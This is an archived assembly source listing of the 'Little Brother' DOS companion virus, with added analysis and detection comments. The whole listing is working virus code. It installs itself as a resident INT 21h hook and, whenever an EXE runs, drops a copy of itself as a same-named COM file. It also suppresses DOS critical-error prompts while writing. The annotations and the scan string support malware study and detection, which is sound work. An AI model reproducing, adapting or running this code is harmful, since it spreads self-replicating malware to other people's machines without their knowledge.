/ HPAVC / HPAVC CD-ROM.iso / B.ZIP / BROTHER1.ZIP / LTBRO299.ASM < prev   
Assembly Source File  |  1992-03-08  |  8KB  |  247 lines

  1.  
  2. ;****************************************************************************
  3. ;*                                                                          * 
  4. ;*                       ASM Source Code For:                               *
  5. ;*                 Little Brother Virus -  Version 1                        *
  6. ;*                                                                          *
  7. ;****************************************************************************
  8.  
  9. cseg            segment                 ;one segment holds both code and data
  10.                 assume  cs:cseg,ds:cseg,es:nothing
  11.  
  12.                 org     100h            ;image starts at offset 100h (.COM-style origin)
  13.  
  14. FILELEN         equ     end - begin     ;byte length of the image; also the size marker tested in do_com
      ;NOTE(review): the archive name LTBRO299.ASM hints at 299 bytes; the listing itself gives no number
  15. RESPAR          equ     (FILELEN/16) + 17   ;not referenced anywhere else in this listing
  16. VERSION         equ     1               ;low byte of the install-check reply (4100h+VERSION)
  17. oi21            equ     end             ;4 bytes starting at end: saved INT 21h vector
  18. nameptr         equ     end+4           ;4 bytes: far pointer to the file name being executed
  19. DTA             equ     end+8           ;disk transfer area used by the find-first calls
  20.  
  21.                 .RADIX  16              ;unsuffixed numbers are hex from here on, so `int 21` below is INT 21h
  22.  
  23.  
  24. ;****************************************************************************
  25. ;*              Start the program!
  26. ;****************************************************************************
      ;  Installer (program entry). Analysis notes:
      ;   - probes for a resident copy with INT 21h, AX=0DEDEh; a reply of
      ;     AH=41h means "already installed" and nothing more is done
      ;   - otherwise copies the FILELEN-byte image to 0044:0100 (linear 00540h),
      ;     stores the current INT 21h vector in oi21 and points INT 21h at ni21
      ;   - finishes with a near RET in both cases
      ;  Detection: an INT 21h vector whose segment is 0044h, or the AX=0DEDEh
      ;  probe coming back as AX=4100h+VERSION, indicates the resident copy.
  27.  
  28. begin:          cld                     ;string instructions count upward
  29.  
  30.                 mov     ax,0DEDEh               ;already installed?
  31.                 int     21h
  32.                 cmp     ah,041h                 ;resident handler answers AH=41h (see do_DEDE)
  33.                 je      cancel
  34.  
  35.                 mov     ax,0044h                ;move program to empty hole
  36.                 mov     es,ax
  37.                 mov     di,0100h
  38.                 mov     si,di
  39.                 mov     cx,FILELEN
  40.         rep     movsb                           ;DS:0100 -> 0044:0100; CX is 0 afterwards
  41.  
  42.                 mov     ds,cx                   ;get original int21 vector (DS=0 because CX=0)
  43.                 mov     si,0084h                ;0000:0084 = vector table entry 21h*4
  44.                 mov     di,offset oi21
  45.                 movsw                           ;offset word
  46.                 movsw                           ;segment word
  47.  
  48.                 push    es                      ;set vector to new handler
  49.                 pop     ds
  50.                 mov     dx,offset ni21
  51.                 mov     ax,2521h                ;AH=25h set vector, AL=21h; new vector is DS:DX
  52.                 int     21h
  53.  
  54. cancel:         ret
  55.  
  56.  
  57. ;****************************************************************************
  58. ;*              File-extensions
  59. ;****************************************************************************
      ;  Each entry is 4 bytes (3 letters + NUL). infect compares the first 3
      ;  bytes byte-for-byte, so only an upper-case extension matches;
      ;  change_ext copies all 4 bytes as two words.
  60.  
  61. EXE_txt         db      'EXE',0
  62. COM_txt         db      'COM',0
  63.  
  64.  
  65. ;****************************************************************************
  66. ;*              Interrupt handler 24
  67. ;****************************************************************************
      ;  Replacement critical-error handler, installed by infect only while it
      ;  creates and writes a file. Returning AL=3 tells DOS to fail the call,
      ;  so no critical-error prompt reaches the user.
  68.  
  69. ni24:           mov     al,03                   ;AL=3: fail the DOS call
  70.                 iret
  71.  
  72.  
  73. ;****************************************************************************
  74. ;*              Interrupt handler 21
  75. ;****************************************************************************
      ;  Resident INT 21h hook. Analysis notes:
      ;   - AX=0DEDEh is answered here with AX=4100h+VERSION and never reaches
      ;     the original handler (the install check used by begin)
      ;   - AX=4B00h (load and execute) calls infect first
      ;   - every other request, and 4B00h after infect, is passed on unchanged
      ;     by a far jump through the vector saved in oi21
      ;  DX, BX, AX, DS, ES and the flags are saved around infect.
  76.  
  77. ni21:           pushf
  78.  
  79.                 cmp     ax,0DEDEh               ;install-check ?
  80.                 je      do_DEDE
  81.  
  82.                 push    dx
  83.                 push    bx
  84.                 push    ax
  85.                 push    ds
  86.                 push    es
  87.  
  88.                 cmp     ax,4B00h                ;execute ?
  89.                 jne     exit
  90.  
  91. doit:           call    infect                  ;DS:DX -> name of the program being started
  92.  
  93. exit:           pop     es
  94.                 pop     ds
  95.                 pop     ax
  96.                 pop     bx
  97.                 pop     dx
  98.                 popf
  99.  
  100.                 jmp     dword ptr cs:[oi21]     ;call to old int-handler
  101.  
  102. do_DEDE:        mov     ax,04100h+VERSION       ;return a signature
  103.                 popf                            ;drop the flags pushed at entry
  104.                 iret
  105.  
  106.  
  107. ;****************************************************************************
  108. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  109. ;****************************************************************************
       ;  Called from ni21 for AX=4B00h. Analysis notes:
       ;   - extension is 'EXE': the caller's name buffer is switched to 'COM',
       ;     a new file of that name is created (function 5Bh, which fails if the
       ;     file already exists) and the FILELEN-byte image is written to it; a
       ;     short write deletes the file again; the buffer is then switched back
       ;     to 'EXE'
       ;   - any other extension (do_com): if the low word of the named file's
       ;     size equals FILELEN and a same-named .EXE exists, the buffer is left
       ;     naming the .EXE, so the original handler loads that program
       ;   - ctrl-break checking is switched off and INT 24h is pointed at ni24
       ;     while the file is written; both are restored at return1
       ;  Detection: a .COM file next to a same-named .EXE whose length equals
       ;  FILELEN and whose last bytes are 'Little Brother',0.
  110.  
  111. infect:         cld
  112.  
  113.                 mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
  114.                 mov     word ptr cs:[nameptr+2],ds
  115.  
  116.                 push    cs                      ;set new DTA
  117.                 pop     ds
  118.                 mov     dx,offset DTA
  119.                 mov     ah,1Ah
  120.                 int     21                      ;INT 21h (.RADIX 16); DTA = CS:DTA
  121.  
  122.                 call    searchpoint             ;ES:DI -> byte after the first '.'
  123.                 mov     si,offset EXE_txt       ;is extension 'EXE'?
  124.                 mov     cx,3
  125.         rep     cmpsb                           ;the REP prefix acts as REPE on CMPSB
  126.                 jnz     do_com                  ;extension is not 'EXE'
  127.  
  128. do_exe:         mov     si,offset COM_txt       ;change extension to COM
  129.                 call    change_ext              ;rewrites the caller's name buffer in place
  130.  
  131.                 mov     ax,3300h                ;get ctrl-break flag
  132.                 int     21
  133.                 push    dx                      ;old flag is in DL
  134.  
  135.                 xor     dl,dl                   ;clear the flag
  136.                 mov     ax,3301h
  137.                 int     21
  138.  
  139.                 mov     ax,3524h                ;get int24 vector
  140.                 int     21
  141.                 push    bx                      ;old vector offset
  142.                 push    es                      ;old vector segment
  143.  
  144.                 push    cs                      ;set int24 vec to new handler
  145.                 pop     ds
  146.                 mov     dx,offset ni24
  147.                 mov     ax,2524h
  148.                 int     21
  149.  
  150.                 lds     dx,dword ptr [nameptr]  ;create the file (unique name)
  151.                 xor     cx,cx                   ;attributes = 0
  152.                 mov     ah,5Bh                  ;create new file; fails if it already exists
  153.                 int     21
  154.                 jc      return1                 ;create failed: nothing is written
  155.                 xchg    bx,ax                   ;save handle
  156.  
  157.                 push    cs
  158.                 pop     ds
  159.                 mov     cx,FILELEN              ;write the file
  160.                 mov     dx,offset begin
  161.                 mov     ah,40h
  162.                 int     21
  163.                 cmp     ax,cx                   ;AX = bytes actually written
  164.                 pushf                           ;keep the result across the close
  165.  
  166.                 mov     ah,3Eh                  ;close the file
  167.                 int     21
  168.  
  169.                 popf
  170.                 jz      return1                 ;all bytes written?
  171.  
  172.                 lds     dx,dword ptr [nameptr]  ;delete the file
  173.                 mov     ah,41h
  174.                 int     21
  175.  
  176. return1:        pop     ds                      ;restore int24 vector
  177.                 pop     dx                      ;DS:DX = the ES:BX saved above
  178.                 mov     ax,2524h
  179.                 int     21
  180.  
  181.                 pop     dx                      ;restore ctrl-break flag
  182.                 mov     ax,3301h
  183.                 int     21
  184.  
  185.                 mov     si,offset EXE_txt       ;change extension to EXE
  186.                 call    change_ext
  187.  
  188. return:         ret
  189.  
  190. do_com:         call    findfirst               ;is the file a virus?
  191.                 cmp     word ptr cs:[DTA+1Ah],FILELEN   ;DTA+1Ah = low word of the file size
  192.                 jne     return
  193.                 mov     si,offset EXE_txt       ;does the EXE-variant exist?
  194.                 call    change_ext
  195.                 call    findfirst
  196.                 jnc     return                  ;found: buffer keeps the .EXE name
  197.                 mov     si,offset COM_txt       ;change extension to COM
  198.                 jmp     short change_ext        ;change_ext's RET returns to infect's caller
  199.  
  200.  
  201. ;****************************************************************************
  202. ;*              Find the file
  203. ;****************************************************************************
       ;  Find-first (AH=4Eh) on the name stored in nameptr. nameptr is read
       ;  through DS, so DS must equal CS on entry; on return DS:DX points at
       ;  the name. The result lands in the DTA set by infect, and the carry
       ;  flag is set when no file matches.
  204.  
  205. findfirst:      lds     dx,dword ptr [nameptr]
  206.                 mov     cl,27h                  ;attribute mask: archive+system+hidden+read-only
  207.                 mov     ah,4Eh
  208.                 int     21                      ;INT 21h (.RADIX 16)
  209.                 ret
  210.  
  211.  
  212. ;****************************************************************************
  213. ;*              change the extension of the filename (CS:SI -> ext)
  214. ;****************************************************************************
       ;  Overwrites the 4 bytes after the first '.' of the name in nameptr with
       ;  the 4 bytes at CS:SI (3 letters + NUL). The name is edited in the
       ;  caller's own buffer. DS equals CS on return.
  215.  
  216. change_ext:     call    searchpoint             ;ES:DI -> byte after the first '.'
  217.                 push    cs
  218.                 pop     ds
  219.                 movsw                           ;first two letters
  220.                 movsw                           ;third letter and the NUL
  221.                 ret
  222.  
  223.  
  224. ;****************************************************************************
  225. ;*              search begin of extension  
  226. ;****************************************************************************
       ;  Loads ES:DI from nameptr and scans forward for '.'. On return ES:DI
       ;  points at the byte after the first '.' in the string. Only CH is set
       ;  for the scan count; CL keeps whatever value the caller left in it.
  227.  
  228. searchpoint:    les     di,dword ptr cs:[nameptr]
  229.                 mov     ch,0FFh                 ;scan count is at least 0FF00h
  230.                 mov     al,'.'
  231.         repnz   scasb                           ;stops once the '.' has been passed
  232.                 ret
  233.  
  234.  
  235. ;****************************************************************************
  236. ;*              Text and Signature
  237. ;****************************************************************************
       ;  These are the last bytes of the image, so every file written by infect
       ;  ends with this plain ASCII text; it can serve as a scan string.
  238.  
  239.                 db      'Little Brother',0
  240.  
  241. end:                                            ;end of the image; oi21, nameptr and DTA are addressed from here
  242.  
  243. cseg            ends
  244.                 end     begin                   ;program entry point is begin
  245.  
  246.  
  247.